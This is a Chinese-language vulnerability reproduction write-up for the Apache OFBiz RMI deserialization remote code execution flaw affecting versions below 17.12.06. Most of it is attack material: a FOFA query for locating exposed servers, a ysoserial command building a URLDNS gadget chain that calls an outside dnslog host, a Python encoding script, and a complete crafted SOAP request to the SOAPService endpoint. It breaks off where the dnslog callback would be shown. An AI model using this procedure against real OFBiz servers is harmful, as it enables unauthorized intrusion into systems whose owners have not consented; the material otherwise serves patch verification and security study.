Apache OFBiz
Apache OFBiz是一個非常著名的電子商務平台,提供了建立基于最新J2EE/XML規範和技術标準,建構大中型企業級、跨平台、跨資料庫、跨應用伺服器的多層、分布式電子商務類WEB應用系統的架構。
漏洞簡介
2021年3月22日 Apache OFBiz官方釋出安全更新,修複了一處由RMI反序列化造成的遠端代碼執行漏洞。攻擊者可構造惡意請求,觸發反序列化,進而造成任意代碼執行,控制伺服器。
影響版本
Apache OFBiz < 17.12.06
漏洞複現
fofa搜尋關鍵詞:
app="Apache_OFBiz"
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLicmbw5SMkdjZlZjN2MjYkBTY1kzMxgDN0kjM1UTNmFzMhVTYz8CX0JXZ252bj91Ztl2Lc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
利用ysoserial生成URLDNS利用鍊:
java -jar ysoserial.jar URLDNS http://***.dnslog.cn > dns.ot
公衆号(黑客前沿)回複 ysoserial 擷取下載下傳連結
利用python腳本将ot檔案解碼:
import binascii
filename = 'dns.ot'
with open(filename, 'rb') as f:
content = f.read()
print(binascii.hexlify(content))
構造請求資料包:
POST /webtools/control/SOAPService HTTP/1.1
Host: IP:PORT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Content-Length: 1010
Accept: */*
Content-Type: application/xml
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-HashMap>
<map-Entry>
<map-Key>
<cus-obj>(ot檔案解碼出來的字元串)</cus-obj>
</map-Key>
<map-Value>
<std-String value="(DNSlog位址)"/>
</map-Value>
</map-Entry>
</map-HashMap>
</ser>
</soapenv:Body>
</soapenv:Envelope>
送出後,DNSlog收到請求: